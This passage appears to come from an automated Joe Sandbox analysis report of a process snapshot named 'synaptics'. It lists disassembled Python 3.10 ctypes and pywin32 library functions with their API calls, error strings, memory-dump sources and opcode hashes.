                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Authority$CountErrorIdentifierLastValid
                                                                                                                                                                                                              • String ID: %lu$-%lu$0x%02hx%02hx%02hx%02hx%02hx%02hx$S-%lu-
                                                                                                                                                                                                              • API String ID: 228009767-531523367
                                                                                                                                                                                                              • Opcode ID: 293bd92c2688c6e8e83081ee402d37f2853fb5774408342a7668a022d39ce28a
                                                                                                                                                                                                              • Instruction ID: 07f0c4cff6264e1a9a73033f5fcbaa3e759900616d4ca2df28a220bcc9de02c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 293bd92c2688c6e8e83081ee402d37f2853fb5774408342a7668a022d39ce28a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99315AB34142655FD728EB7C9C54A777FE8EB9A3027044859F0E6C2162E63DE618CB70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,On:resize,?,?), ref: 6C0AAF76
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,minimum size is %zd,?), ref: 6C0AAFBB
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,Memory cannot be resized because this object doesn't own it), ref: 6C0AAFDC
                                                                                                                                                                                                              • PyMem_Calloc.PYTHON310(00000001,?), ref: 6C0AB00D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0AB026
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,excepted ctypes instance), ref: 6C0AB078
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 0bal, xrefs: 6C0AB046
                                                                                                                                                                                                              • Memory cannot be resized because this object doesn't own it, xrefs: 6C0AAFD5
                                                                                                                                                                                                              • On:resize, xrefs: 6C0AAF6E
                                                                                                                                                                                                              • minimum size is %zd, xrefs: 6C0AAFB4
                                                                                                                                                                                                              • excepted ctypes instance, xrefs: 6C0AB071
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$Format$Arg_CallocMem_ParseStringTuplememcpy
                                                                                                                                                                                                              • String ID: 0bal$Memory cannot be resized because this object doesn't own it$On:resize$excepted ctypes instance$minimum size is %zd
                                                                                                                                                                                                              • API String ID: 2069208136-1699128057
                                                                                                                                                                                                              • Opcode ID: 8ac610829f82faffa9c7c0e122df33a7baf369d19a163b4836d889d468467d04
                                                                                                                                                                                                              • Instruction ID: faa87a66e3491084d9cf5f570229a5e4d01a8f4035c113ea0c2350ff50a8569a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ac610829f82faffa9c7c0e122df33a7baf369d19a163b4836d889d468467d04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2131BC70A04009EFCB14CFD8DA84E9877F4EB0A319F1441A4ED0C97622EB339926DB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyObject_IsInstance.PYTHON310(?,?), ref: 6C0A38F1
                                                                                                                                                                                                              • PyUnicode_AsUTF8.PYTHON310(?), ref: 6C0A393D
                                                                                                                                                                                                              • _PyObject_New.PYTHON310(6C0B5D90), ref: 6C0A3955
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6C0A39AC
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A39B8
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(?,6C0B6814,6C0B6110), ref: 6C0A39CB
                                                                                                                                                                                                              • Py_EnterRecursiveCall.PYTHON310(while processing _as_parameter_), ref: 6C0A39E7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object_$AttrCallClearDeallocEnterErr_InstanceLookupRecursiveUnicode_
                                                                                                                                                                                                              • String ID: abstract class$while processing _as_parameter_$wrong type
                                                                                                                                                                                                              • API String ID: 179561668-1173273510
                                                                                                                                                                                                              • Opcode ID: f374778ddb0c56e7f3029b98d26aa8a00fc1ca3327ecaccd2b4e9586bcaf7489
                                                                                                                                                                                                              • Instruction ID: adc96952c30ead439c1f1d8725d0e88f04af7313847be285e877a40eec329b05
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f374778ddb0c56e7f3029b98d26aa8a00fc1ca3327ecaccd2b4e9586bcaf7489
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6412371A042449FCB00CFE9DC44B8ABBF8EF0A329F144665E92DD7652DB32D916CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyDict_GetItemIdWithError.PYTHON310(00000000), ref: 6C0A3C0E
                                                                                                                                                                                                              • PyLong_AsUnsignedLongMask.PYTHON310(00000000), ref: 6C0A3C2C
                                                                                                                                                                                                              • _PyDict_GetItemIdWithError.PYTHON310(00000000,6C0B67B4), ref: 6C0A3C40
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310(?,?,?,6C556110,6C0A3E9F), ref: 6C0A3C6A
                                                                                                                                                                                                              • _PyDict_GetItemIdWithError.PYTHON310(00000000,6C0B680C,?,?,?,6C556110,6C0A3E9F), ref: 6C0A3C7A
                                                                                                                                                                                                              • PyCallable_Check.PYTHON310(00000000,?,?,?,?,?,6C556110,6C0A3E9F), ref: 6C0A3C9D
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(00000001,6C0B66AC,00000054,?,?,?,?,?,6C556110,6C0A3E9F), ref: 6C0A3CC0
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,class must define _flags_ which must be an integer), ref: 6C0A3CF6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • class must define _flags_ which must be an integer, xrefs: 6C0A3CEA
                                                                                                                                                                                                              • _restype_ must be a type, a callable, or None, xrefs: 6C0A3CAA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dict_ErrorItemWith$Err_$AttrCallable_CheckLongLong_LookupMaskObject_OccurredStringUnsigned
                                                                                                                                                                                                              • String ID: _restype_ must be a type, a callable, or None$class must define _flags_ which must be an integer
                                                                                                                                                                                                              • API String ID: 3499085246-2538317290
                                                                                                                                                                                                              • Opcode ID: f9d0a13513bf048e72eeaddb5709c3575892d79774dc0310acb1cd0e1f5aabe6
                                                                                                                                                                                                              • Instruction ID: ee029ffcf2daa174cb8835181c33e159e6535ba0961bb1f4493ba68ea1a5eee5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9d0a13513bf048e72eeaddb5709c3575892d79774dc0310acb1cd0e1f5aabe6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F41E1B02443019BDB14CFEACE457A6B7F8AF4971CF14092AE849D7A42EB37E006CB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySequence_Tuple.PYTHON310 ref: 6C0A3A78
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,_argtypes_ must be a sequence of types), ref: 6C0A3A93
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(?), ref: 6C0A3AAC
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A3AC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _argtypes_ must be a sequence of types, xrefs: 6C0A3A8C
                                                                                                                                                                                                              • item %zd in _argtypes_ has no from_param method, xrefs: 6C0A3B65
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocErr_Sequence_StringTupleTuple_
                                                                                                                                                                                                              • String ID: _argtypes_ must be a sequence of types$item %zd in _argtypes_ has no from_param method
                                                                                                                                                                                                              • API String ID: 1377132275-3063448601
                                                                                                                                                                                                              • Opcode ID: 06f14bd0425addd018253314c5c5cc64f361a4514362e852d1ed2e1e1ab9d355
                                                                                                                                                                                                              • Instruction ID: a2bf152acb11090e74b40dac577bb8707e4c3bad780dc66a79e4d41623dff51d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06f14bd0425addd018253314c5c5cc64f361a4514362e852d1ed2e1e1ab9d355
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5631E3B1A182059FCB00DFE8ED45ADA73F8EF4533CF0407A5E91993641EB32D9168B95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyNumber_Long.PYTHON310(?,?,?,?,6BF4443E,?,?,6BF443B3,?,?), ref: 6BF4AA68
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310(?), ref: 6BF4AA7D
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284), ref: 6BF4AA95
                                                                                                                                                                                                              • PyLong_AsLong.PYTHON310(00000000,?,?), ref: 6BF4AAA6
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310(?,?), ref: 6BF4AABB
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310(?,?), ref: 6BF4AAC1
                                                                                                                                                                                                              • PyLong_AsUnsignedLong.PYTHON310(00000000,?,?), ref: 6BF4AAC8
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310(?,?,?), ref: 6BF4AAD9
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?), ref: 6BF4AAE5
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284,?,?,?), ref: 6BF4AB00
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?), ref: 6BF4AB16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$LongOccurred$DeallocFormatLong_$ClearNumber_Unsigned
                                                                                                                                                                                                              • String ID: Unable to convert %s to pointer-sized value
                                                                                                                                                                                                              • API String ID: 1151381731-2431006615
                                                                                                                                                                                                              • Opcode ID: 81d43bc573b22725e24d97645f7bf730a9b32d55de6ef4db758b60771f328b28
                                                                                                                                                                                                              • Instruction ID: 118a9655c887699d8396975243c7263b55448255205eab6eb16f1984c0b55f4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d43bc573b22725e24d97645f7bf730a9b32d55de6ef4db758b60771f328b28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5121F673A201119BDB01AB78DC4898A7BE4EF4637570046B1F910C61B7D736D229CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA434,can't delete OVERLAPPED attributes), ref: 6BF45A05
                                                                                                                                                                                                              • PyUnicode_AsUTF8.PYTHON310(?), ref: 6BF45A1A
                                                                                                                                                                                                              • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF45A5F
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6BF45A87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocErr_Object_StringU_object@@Unicode_
                                                                                                                                                                                                              • String ID: Internal$InternalHigh$can't delete OVERLAPPED attributes$hEvent
                                                                                                                                                                                                              • API String ID: 2192652076-1618803428
                                                                                                                                                                                                              • Opcode ID: 3566a46f6143da895678c1d5e25cf8ea1e7cb09d4b22e58640271005948a372b
                                                                                                                                                                                                              • Instruction ID: 1ea5a53106363e15e04918b7c6e27388ee503db2bb43e824601ce163761c9a11
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3566a46f6143da895678c1d5e25cf8ea1e7cb09d4b22e58640271005948a372b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5541E773B1C2414BD700EF34B890696BFE5EF92364B4849A6E985C7273E32AD44DC751
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310({s:O,s:l,s:l,s:l,s:N},MultipleTrustee,MultipleTrusteeOperation,00000000,TrusteeForm,?,TrusteeType,00000000,Identifier,00000000), ref: 6BF41F4D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EB154,TrusteeForm not yet supported), ref: 6BF41F68
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,Invalid value for TrusteeForm), ref: 6BF41F85
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String$BuildValue
                                                                                                                                                                                                              • String ID: Identifier$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}
                                                                                                                                                                                                              • API String ID: 2043207840-1816636059
                                                                                                                                                                                                              • Opcode ID: 27bd332faed85846f97e150531e4b12caf58b8ee23c9163ca712cc9c411d8cfc
                                                                                                                                                                                                              • Instruction ID: f3867e617a731b5e1de9976ed38772c443622c5ed4f752986ac05cf420ab5859
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27bd332faed85846f97e150531e4b12caf58b8ee23c9163ca712cc9c411d8cfc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3711C437220100AFDB09EF48DC84F62BF71EB9672271041AAF5099653BD736D9399B71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,fileno), ref: 6BF49F2C
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF49F3B
                                                                                                                                                                                                              • PyCallable_Check.PYTHON310(00000000), ref: 6BF49F46
                                                                                                                                                                                                              • PyObject_CallObject.PYTHON310(00000000,00000000), ref: 6BF49F56
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF49F67
                                                                                                                                                                                                              • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(00000000,?), ref: 6BF49F80
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyNumber_Long.PYTHON310(?,?,?,?,6BF4443E,?,?,6BF443B3,?,?), ref: 6BF4AA68
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Occurred.PYTHON310(?), ref: 6BF4AA7D
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284), ref: 6BF4AA95
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF49F90
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF49F9D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Expected a socket object or numeric socket handle), ref: 6BF49FAF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Expected a socket object or numeric socket handle, xrefs: 6BF49FA8
                                                                                                                                                                                                              • fileno, xrefs: 6BF49F26
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$ClearDeallocObject_String$AttrCallCallable_CheckFormatLongLong_Number_ObjectOccurredPtr@@U_object@@Void
                                                                                                                                                                                                              • String ID: Expected a socket object or numeric socket handle$fileno
                                                                                                                                                                                                              • API String ID: 2744458427-511972153
                                                                                                                                                                                                              • Opcode ID: c84bd386b0f5c6e66aed6592a8c77fa6352fd773005eccb9722aaf1c13f4c93b
                                                                                                                                                                                                              • Instruction ID: ffd3eb37dc7b0d9efd9ff3bae9ecec750eaba05e94373ae8aa9aa7f76b3cf9a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c84bd386b0f5c6e66aed6592a8c77fa6352fd773005eccb9722aaf1c13f4c93b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7014C37D241115FC7016B64AD0978A3FB0DF83331B0441A4F81692277EB28D66D87A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyDict_New.PYTHON310(00000000,00000000,?), ref: 6C0A3FCF
                                                                                                                                                                                                              • PyUnicode_FromStringAndSize.PYTHON310(?,?,00000000,00000000,?), ref: 6C0A4053
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(6C0A1831), ref: 6C0A4068
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,ctypes object structure too deep,00000000,00000000,?), ref: 6C0A40A0
                                                                                                                                                                                                              • PyDict_SetItem.PYTHON310(00000000,00000000,6C0A1930), ref: 6C0A40B6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A40D1
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(6C0A1831), ref: 6C0A40DC
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(6C7F1FB9,00000000,00000000,?), ref: 6C0A4105
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Dict_String$Err_FromItemSizeUnicode_
                                                                                                                                                                                                              • String ID: :%x$ctypes object structure too deep
                                                                                                                                                                                                              • API String ID: 1245207887-3091822184
                                                                                                                                                                                                              • Opcode ID: 098cd6854d1bd248004406da7bb10dfe2670dedd4941bf91f542f05a896afce8
                                                                                                                                                                                                              • Instruction ID: 8ec8339efca33f9f11dd27685f2c5decb00a418ea2ddd95f9157da99146550e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 098cd6854d1bd248004406da7bb10dfe2670dedd4941bf91f542f05a896afce8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D51D7B5A042199BCB14CFF9C940BC9B3F4FF09328F1007A9D95993A41DB72E995CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyObject_IsInstance.PYTHON310(?,?), ref: 6C0A2307
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(6C0B6110,6C0B5438), ref: 6C0A232F
                                                                                                                                                                                                              • PyObject_IsSubclass.PYTHON310(?,?), ref: 6C0A236A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object_$InstanceSubclassSubtypeType_
                                                                                                                                                                                                              • String ID: abstract class$expected CData instance
                                                                                                                                                                                                              • API String ID: 197320188-800417977
                                                                                                                                                                                                              • Opcode ID: 10dff78e9b0ae2764723fa57a346957b295e77e867fb85d3d3f90a7c9464114b
                                                                                                                                                                                                              • Instruction ID: a6b631d7d96d125a8275880a3e4d81a1c2b07408f9e468bf9a9cf4f35474df1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10dff78e9b0ae2764723fa57a346957b295e77e867fb85d3d3f90a7c9464114b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 804128723092009FCB088BDAE845795B3F8FF0122EB24497AEA1DD6912D733D4528794
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,Sequence of dwords cannot be None), ref: 6BF4A99D
                                                                                                                                                                                                              • PySequence_Tuple.PYTHON310(?), ref: 6BF4A9AD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Sequence of dwords cannot be None, xrefs: 6BF4A996
                                                                                                                                                                                                              • Unable to allocate %d bytes, xrefs: 6BF4A9E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Sequence_StringTuple
                                                                                                                                                                                                              • String ID: Sequence of dwords cannot be None$Unable to allocate %d bytes
                                                                                                                                                                                                              • API String ID: 2560365869-651347692
                                                                                                                                                                                                              • Opcode ID: e2dd6803b55463379dc23d1f0178a64272cf122aa9c7232b2f658a8c36adf316
                                                                                                                                                                                                              • Instruction ID: 482c8d9706f4e7bd6f84940887a71fb2e7ce96b98804d68d2a6d62aff89bc4a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2dd6803b55463379dc23d1f0178a64272cf122aa9c7232b2f658a8c36adf316
